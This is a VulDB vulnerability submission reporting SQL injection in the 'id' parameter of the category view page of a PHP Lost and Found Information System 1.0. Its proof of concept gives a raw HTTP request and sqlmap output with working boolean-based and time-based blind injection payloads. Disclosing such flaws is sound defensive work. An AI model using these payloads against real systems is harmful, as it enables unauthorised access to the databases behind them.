Enviar #155230: SQL Injection in view category function in Lost and Found Information Systeminformación

Título	SQL Injection in view category function in Lost and Found Information System
Descripción	SQL Injection in view category function in Lost and Found Information System 1.0 parameter: id Producion: Lost and Found Information System Version: 1.0 PoC: Request: GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/php-lfis/admin/?page=categories Connection: close Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Run request with sqlmap and output: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb ---
Fuente	⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Usuario	huutuanbg97 (UID 45015)
Sumisión	2023-05-11 17:32 (hace 3 años)
Moderación	2023-05-12 08:01 (14 hours later)
Estado	Aceptado
Entrada de VulDB	228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category ID inyección SQL]
Puntos	20

◂ Anterior Visión De Conjunto Próximo ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!